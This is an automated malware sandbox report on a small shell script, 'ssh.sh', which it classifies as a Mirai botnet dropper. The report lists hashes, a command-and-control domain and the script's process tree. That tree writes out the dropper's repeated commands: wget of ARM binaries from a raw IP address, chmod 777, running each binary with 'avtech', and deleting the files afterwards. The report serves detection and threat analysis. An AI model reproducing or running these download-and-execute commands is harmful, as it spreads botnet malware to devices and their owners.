Overview

overview

10

Static

static

1

ssh.sh

ubuntu-18.04-amd64

10

ssh.sh

debian-9-armhf

10

ssh.sh

debian-9-mips

10

ssh.sh

debian-9-mipsel

10

Analysis

  • max time kernel
    10s
  • max time network
    11s
  • platform
    debian-9_mipsel
  • resource
    debian9-mipsel-20240418-en
  • resource tags

    arch:mipselimage:debian9-mipsel-20240418-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
  • submitted
    23-11-2024 17:20

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ssh.sh

  • Size

    639B

  • MD5

    61f6f361a8641428ec15e652569064b8

  • SHA1

    f3c5b2338ce425c32eec3abd2310ba992bd3ab94

  • SHA256

    ce3ca0522b38c3931522cac2f1218dbc231624674dcc80ce76b4a26ecffdd8f1

  • SHA512

    0402ef7c2bd4100f3c40ec5d2a60fe1060cd5a42f4762dd398e685db82abd221df7f260be27a3c95394ba7b0665556b2e22f860f23bf6fceda6651e1048471fe

Score
10/10
miraibotnetdefense_evasion

Malware Config

Extracted

Family

mirai

C2

gay.nguyenletriloc.pro

Signatures

  • Mirai

    Mirai is a prevalent Linux malware infecting exposed network devices.

    botnetmirai
  • Mirai family
    mirai
  • File and Directory Permissions Modification 1 TTPs 8 IoCs

    Adversaries may modify file or directory permissions to evade defenses.

    defense_evasion
  • Executes dropped EXE 8 IoCs

Processes

  • /tmp/ssh.sh
    /tmp/ssh.sh
    1⤵
      PID:693
      • /bin/rm
        rm -rf main_arm
        2⤵
          PID:695
        • /usr/bin/wget
          wget http://66.36.234.2/main_arm -O -
          2⤵
            PID:697
          • /bin/chmod
            chmod 777 main_arm
            2⤵
            • File and Directory Permissions Modification
            PID:718
          • /var/tmp/main_arm
            ./main_arm avtech
            2⤵
            • Executes dropped EXE
            PID:720
          • /bin/rm
            rm -rf main_arm
            2⤵
              PID:722
            • /bin/rm
              rm -rf main_arm5
              2⤵
                PID:723
              • /usr/bin/wget
                wget http://66.36.234.2/main_arm5 -O -
                2⤵
                  PID:724
                • /bin/chmod
                  chmod 777 main_arm5
                  2⤵
                  • File and Directory Permissions Modification
                  PID:727
                • /var/tmp/main_arm5
                  ./main_arm5 avtech
                  2⤵
                  • Executes dropped EXE
                  PID:728
                • /bin/rm
                  rm -rf main_arm5
                  2⤵
                    PID:730
                  • /bin/rm
                    rm -rf main_arm6
                    2⤵
                      PID:731
                    • /usr/bin/wget
                      wget http://66.36.234.2/main_arm6 -O -
                      2⤵
                        PID:732
                      • /bin/chmod
                        chmod 777 main_arm6
                        2⤵
                        • File and Directory Permissions Modification
                        PID:733
                      • /var/tmp/main_arm6
                        ./main_arm6 avtech
                        2⤵
                        • Executes dropped EXE
                        PID:734
                      • /bin/rm
                        rm -rf main_arm6
                        2⤵
                          PID:736
                        • /bin/rm
                          rm -rf main_arm7
                          2⤵
                            PID:737
                          • /usr/bin/wget
                            wget http://66.36.234.2/main_arm7 -O -
                            2⤵
                              PID:738
                            • /bin/chmod
                              chmod 777 main_arm7
                              2⤵
                              • File and Directory Permissions Modification
                              PID:739
                            • /var/tmp/main_arm7
                              ./main_arm7 avtech
                              2⤵
                              • Executes dropped EXE
                              PID:740
                            • /bin/rm
                              rm -rf main_arm7
                              2⤵
                                PID:742
                              • /bin/rm
                                rm -rf arm
                                2⤵
                                  PID:743
                                • /usr/bin/wget
                                  wget http://66.36.234.2/arm -O -
                                  2⤵
                                    PID:744
                                  • /bin/chmod
                                    chmod 777 arm
                                    2⤵
                                    • File and Directory Permissions Modification
                                    PID:745
                                  • /var/tmp/arm
                                    ./arm avtech
                                    2⤵
                                    • Executes dropped EXE
                                    PID:747
                                  • /bin/sh
                                    /bin/sh ./arm avtech
                                    2⤵
                                      PID:747
                                    • /bin/rm
                                      rm -rf arm
                                      2⤵
                                        PID:750
                                      • /bin/rm
                                        rm -rf arm5
                                        2⤵
                                          PID:751
                                        • /usr/bin/wget
                                          wget http://66.36.234.2/arm5 -O -
                                          2⤵
                                            PID:752
                                          • /bin/chmod
                                            chmod 777 arm5
                                            2⤵
                                            • File and Directory Permissions Modification
                                            PID:759
                                          • /var/tmp/arm5
                                            ./arm5 avtech
                                            2⤵
                                            • Executes dropped EXE
                                            PID:761
                                          • /bin/sh
                                            /bin/sh ./arm5 avtech
                                            2⤵
                                              PID:761
                                            • /bin/rm
                                              rm -rf arm5
                                              2⤵
                                                PID:764
                                              • /bin/rm
                                                rm -rf arm6
                                                2⤵
                                                  PID:765
                                                • /usr/bin/wget
                                                  wget http://66.36.234.2/arm6 -O -
                                                  2⤵
                                                    PID:766
                                                  • /bin/chmod
                                                    chmod 777 arm6
                                                    2⤵
                                                    • File and Directory Permissions Modification
                                                    PID:782
                                                  • /var/tmp/arm6
                                                    ./arm6 avtech
                                                    2⤵
                                                    • Executes dropped EXE
                                                    PID:783
                                                  • /bin/sh
                                                    /bin/sh ./arm6 avtech
                                                    2⤵
                                                      PID:783
                                                    • /bin/rm
                                                      rm -rf arm6
                                                      2⤵
                                                        PID:786
                                                      • /bin/rm
                                                        rm -rf arm7
                                                        2⤵
                                                          PID:787
                                                        • /usr/bin/wget
                                                          wget http://66.36.234.2/arm7 -O -
                                                          2⤵
                                                            PID:788
                                                          • /bin/chmod
                                                            chmod 777 arm7
                                                            2⤵
                                                            • File and Directory Permissions Modification
                                                            PID:795
                                                          • /var/tmp/arm7
                                                            ./arm7 avtech
                                                            2⤵
                                                            • Executes dropped EXE
                                                            PID:796
                                                          • /bin/sh
                                                            /bin/sh ./arm7 avtech
                                                            2⤵
                                                              PID:796
                                                            • /bin/rm
                                                              rm -rf arm7
                                                              2⤵
                                                                PID:799
                                                              • /bin/rm
                                                                rm /tmp/ssh.sh
                                                                2⤵
                                                                  PID:800

                                                              Network

                                                              MITRE ATT&CK Enterprise v15

                                                              Replay Monitor

                                                              Loading Replay Monitor...

                                                              Downloads

                                                              • /var/tmp/main_arm
                                                                Filesize

                                                                130KB

                                                                MD5

                                                                b5b7f0c68cdf6458e137e7dfb1d74e6f

                                                                SHA1

                                                                ceb4700b167cff05ccb77a25260bf696b39b8e63

                                                                SHA256

                                                                6017dc10e1edd004384c5b0033e237a81e293d8668459c107f057fbdc62f771c

                                                                SHA512

                                                                acdcee90b0ff85e4ed35ba3ab254065b43645ddc0242f097392f8b49967642a95d393b43e039c84aa5e9c52dbfd5efd27a441162227ac3b9b169226c228a3c3d

                                                                Download Submit

                                                              • /var/tmp/main_arm5
                                                                Filesize

                                                                130KB

                                                                MD5

                                                                b3d2c1afb1984b43648625b48eb1373e

                                                                SHA1

                                                                3592776c6e0f9e67c38c5a8bfff7da67629b6713

                                                                SHA256

                                                                7066eea40920fc2a9a029276906a8fd8188f501f7c14078116e0523e667687a2

                                                                SHA512

                                                                0f739303ac523d66eb032500f7bfd48bc5fa5f26bac43124a4d2564ae1a5558dfcfae7a70e45907ba7d15a82ae01d507fdd78a97de3050b5a982dcf7a5c3d627

                                                                Download Submit

                                                              • /var/tmp/main_arm6
                                                                Filesize

                                                                142KB

                                                                MD5

                                                                daa33b1e666b1386b51ff9793150fdff

                                                                SHA1

                                                                999d619976b11ae71e575ced094011f0b95b1905

                                                                SHA256

                                                                d47526004f78450ce96e34f8cbb0a77a12d7aa083ff4e497a67ca65130bca32e

                                                                SHA512

                                                                c351a078605d2870a643b1822d3fcf412aad81e20a4d1dc6c505f09c64c81881d75feb1c4e6bea60814191bf3b984a2b080a950a1aa29b3cc920affd48be9fa6

                                                                Download Submit

                                                              • /var/tmp/main_arm7
                                                                Filesize

                                                                179KB

                                                                MD5

                                                                0523d595f7f8b7b8bf05cb804de5f32f

                                                                SHA1

                                                                5fcd1fb36f56d96c9185ce454613946f7161df4d

                                                                SHA256

                                                                7045550dcae0e634c84ac8729c51c0972de3ec326d6541d48d2fc3fbc8c59093

                                                                SHA512

                                                                079cd6dfe752a3024837909873b6fe029fe5171ec25cd081a39b36652c52f42d75b321e3acd48e37f43f3409f82448a02b94d7eefbfe5a7ccbd73e131290439b

                                                                Download Submit